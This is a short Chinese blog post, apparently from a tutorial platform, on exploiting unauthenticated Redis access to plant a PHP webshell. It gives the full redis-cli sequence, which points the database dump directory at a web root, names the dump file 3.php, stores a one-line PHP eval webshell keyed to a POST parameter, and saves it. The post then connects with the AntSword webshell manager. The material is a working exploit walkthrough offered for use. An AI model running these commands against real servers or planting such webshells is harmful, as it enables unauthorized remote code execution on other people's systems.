redis未授权访问漏洞

1、安装蚁剑
安装过程不描述了,就强调一点,如果是解压代码失败,可以使用git命令直接下载源代码,然后选择源代码所在目录进行初始化,之后重启应用即可

2、连接redis写入webshell

这里可以使用图形界面客户端,也可以使用redis-cli
这里介绍直接写入webshell文件的方法,这里必须知道网站存放的物理路径才能行。

PS E:\Redis-x64-3.2.100> .\redis-cli.exe
127.0.0.1:6379> config set dir D:/phpstudy_pro/www    
OK
127.0.0.1:6379> config set dbfilename 3.php
OK
127.0.0.1:6379> set x "<?php @eval($_POST['mamba']); ?>"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379>

先转到网站目录下,然后写入3.php文件 追加文件内容 保存写入持久化

3、蚁剑连接
获取webshell


蚁剑1.jpg
蚁剑2.jpg

4、这种方式无论是windows 还是linux都能行,但是必须知道网站的物理路径,所以有所局限性,下一篇文章重点讲解linux下这个漏洞的利用

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容